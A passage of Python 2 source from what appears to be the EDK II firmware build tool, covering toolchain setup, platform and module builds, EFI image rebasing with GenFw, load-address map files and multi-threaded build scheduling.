self.ToolChainList = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_TOOL_CHAIN_TAG]
if self.ToolChainList == None or len(self.ToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE, ExtraData="No toolchain given. Don't know how to build.\n")
# check if the tool chains are defined or not
NewToolChainList = []
for ToolChain in self.ToolChainList:
if ToolChain not in self.ToolDef.ToolsDefTxtDatabase[TAB_TOD_DEFINES_TOOL_CHAIN_TAG]:
EdkLogger.warn("build", "Tool chain [%s] is not defined" % ToolChain)
else:
NewToolChainList.append(ToolChain)
# if no tool chain available, break the build
if len(NewToolChainList) == 0:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="[%s] not defined. No toolchain available for build!\n" % ", ".join(self.ToolChainList))
else:
self.ToolChainList = NewToolChainList
if self.ThreadNumber == None:
self.ThreadNumber = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_MAX_CONCURRENT_THREAD_NUMBER]
if self.ThreadNumber == '':
self.ThreadNumber = 0
else:
self.ThreadNumber = int(self.ThreadNumber, 0)
if self.ThreadNumber == 0:
self.ThreadNumber = 1
if not self.PlatformFile:
PlatformFile = self.TargetTxt.TargetTxtDictionary[DataType.TAB_TAT_DEFINES_ACTIVE_PLATFORM]
if not PlatformFile:
# Try to find one in current directory
WorkingDirectory = os.getcwd()
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.dsc')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_MISSING,
ExtraData="There are %d DSC files in %s. Use '-p' to specify one.\n" % (FileNum, WorkingDirectory))
elif FileNum == 1:
PlatformFile = FileList[0]
else:
EdkLogger.error("build", RESOURCE_NOT_AVAILABLE,
ExtraData="No active platform specified in target.txt or command line! Nothing can be built.\n")
self.PlatformFile = PathClass(NormFile(PlatformFile, self.WorkspaceDir), self.WorkspaceDir)
## Initialize build configuration
#
# This method will parse DSC file and merge the configurations from
# command line and target.txt, then get the final build configurations.
#
def InitBuild(self):
# parse target.txt, tools_def.txt, and platform file
self.LoadConfiguration()
# Allow case-insensitive for those from command line or configuration file
ErrorCode, ErrorInfo = self.PlatformFile.Validate(".dsc", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
# create metafile database
self.Db.InitDatabase()
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject == None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand == None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError, X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
InfFileNameList = ModuleList.keys()
#InfFileNameList.sort()
for InfFile in InfFileNameList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect funtion address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open (ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] =='F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add funtion address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict.keys():
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid != None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid != None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in ['PEI_CORE', 'PEIM', 'COMBINED_PEIM_DRIVER','PIC_PEIM', 'RELOCATABLE_PEIM', 'DXE_CORE']:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in ['BS_DRIVER', 'DXE_DRIVER', 'UEFI_DRIVER']:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['DXE_RUNTIME_DRIVER', 'RT_DRIVER', 'DXE_SAL_DRIVER', 'SAL_RT_DRIVER']:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['SMM_CORE', 'DXE_SMM_DRIVER']:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == 'DXE_SMM_DRIVER':
PiSpecVersion = '0x00000000'
if 'PI_SPECIFICATION_VERSION' in Module.Module.Specification:
PiSpecVersion = Module.Module.Specification['PI_SPECIFICATION_VERSION']
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize/0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize/0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize/0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize/0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize/0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset = False, ModeIsSmm = True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" %(MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
self.Progress.Stop("done!")
MaList = []
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Ma = ModuleAutoGen(Wa, self.ModuleFile, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None: continue
MaList.append(Ma)
self.BuildModules.append(Ma)
if not Ma.IsBinaryModule:
self._Build(self.Target, Ma, BuildModule=True)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" %\
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa == None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser != None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
